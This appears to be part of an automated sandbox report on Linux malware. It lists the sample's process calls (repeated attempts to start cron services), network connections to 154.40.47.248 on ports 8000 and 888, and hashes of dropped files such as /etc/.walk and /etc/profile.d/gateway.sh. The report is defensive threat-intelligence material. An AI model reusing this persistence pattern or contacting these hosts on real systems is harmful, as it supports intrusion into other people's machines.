[systemctl -p Triggers show systemd-udevd-control.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-udevd-kernel.socket]

/usr/local/sbin/systemctl

[systemctl start cron.service]

/usr/local/bin/systemctl

[systemctl start cron.service]

/usr/sbin/systemctl

[systemctl start cron.service]

/usr/bin/systemctl

[systemctl start cron.service]

/sbin/systemctl

[systemctl start cron.service]

/bin/systemctl

[systemctl start cron.service]

/bin/systemctl

[systemctl start crond.service]

/bin/sleep

[sleep 60]

/bin/sleep

[sleep 60]

Network

Country Destination Domain Proto
US 154.40.47.248:8000 154.40.47.248 tcp
US 154.40.47.248:8000 154.40.47.248 tcp
AU 1.1.1.1:53 www.google.com udp
AU 1.1.1.1:53 www.google.com udp
US 154.40.47.248:888 tcp

Files

/tmp/linux_mips

MD5 5ec2f6c412ccfcc16781a7f3f37fb474
SHA1 912cb18493577a0b5c64d994f4b6bc05990ae390
SHA256 e58dffab271cd20cb6089017017d8e6c5f68c56c2b1877e8a94bbcdadcd4ef4c
SHA512 ce37675e1ccfd0e7fdf2fe155473d94222ceb28cf8a3c797033617a07e7ce632240bdbb338d7c3aec5131a343d172a4d58a05e2558408e42b3eb80cf1767857f

/etc/.walk

MD5 2dd37fddcc243f5581c4ce62ef5fdfc8
SHA1 f6adde2974e8b8b7e384b5556acbca3cc9d5b3f2
SHA256 811d6a6fc9aba79ed06e118d1b06579d68dd81503dd05c469c05005dc828a62b
SHA512 5dc0780584978253f7409adbfc9a83e52dd6c1667724df43dece254390c6fa66b5cf097b409cc1a4178f852061af1db99659cb3c6e61fb809a368fab6086775a

/etc/.walk

MD5 e38a02404d480a130b22e468846d29ee
SHA1 862cc7ead638d06282474432fd60cdaebc8a87c9
SHA256 230b225ff7e6feaa217dcad9777d9503605a8a8f0fbd6020e3ad192d602c045e
SHA512 4b063eb01136320c67f1a1bf01f7e68f6c9cf68755e70b450e20bbb73cc0504f8456418c8b22b3b164a98fbfff5b496558aaf3caa8ed08be83a1c1dac9c6beb8

/etc/32676

MD5 585f408444cbca746945f0cb63f2c3f0
SHA1 0e44bae17174f04514e770ca7fc4bec1007e39cd
SHA256 ebb961c647363dfa90f302de378e0e61807b9b792fc86616635a713cca8f4299
SHA512 022241dbafad55164701f67ef5b84154e3af97c5dfe77dee7bf8406f2befbd2962bbf4f243432b2f41d6c2376b87fcf551fd6945e03ddb02a5619c2f0f69c596

/tmp/linux_mipsel

MD5 06a141032d508ea7639d82c044851727
SHA1 e49bf29f0c21f0e5a5d0ccee733ed1626df57d6b
SHA256 d3030e1575b48293f9364353127bd44892ec65120c11d1710eead510373aab55
SHA512 8173fc77c9ba84dc1a980c907dec6d2a37e20b3dec5438189fb1990e6c161de5a7ebc033091be2bcd7b80fb1bfe1478eb9f81f6811c9417fd95d3419c9cc2e05

/.mod

MD5 f5a3713282e43c200f30342f5ff5e2ea
SHA1 2b2ce1a207e2b691a074c6f78f71c4785aae426a
SHA256 6ab64e727571458d4884fb2fe82c27c467db0699cb8f648b3f0217c35d2b7511
SHA512 5bcb8cd360409147a486755f90e0cdd97183af02ce8de5135b7c6a8a010deb9ef12dcd5ee9a2a8fd2e159347f68e72d6b7fd75e943b4fcd928d7a74b97476013

/usr/bin/include/find

MD5 97b5c6c1b307114efc38193175a343c3
SHA1 24015d4f95c6878ea5027c134eddebb7126b610f
SHA256 b1a89f313023b476fc826d8fac689679504e61ae8e650681fb966e810ed34970
SHA512 e5359f3e082f54f5cfd7afa7771d8724d161d48d09372f203bdca222a47a63919fdfb76b6db7fb8ff61e92f8fd04fdec962e94331ff12705cf53ce5e23d33180

/etc/profile.d/gateway.sh

MD5 9f3e861844e604c6c4c074d948aeeabf
SHA1 61d9060d95a41796eff5adeebab13038775506c5
SHA256 8704842b0b1612a923d6c8660a3f08b9f05a0340328fc46f3a555ab40b41cbca
SHA512 173bbf3d699c5948acd3cb7892a8bc1e467a4edaeb98765e0c792d2fabfa7ac29e06a02fbd3ac7ac2ada13769788151d38aa9b2baec9c086d570b4887b9057d5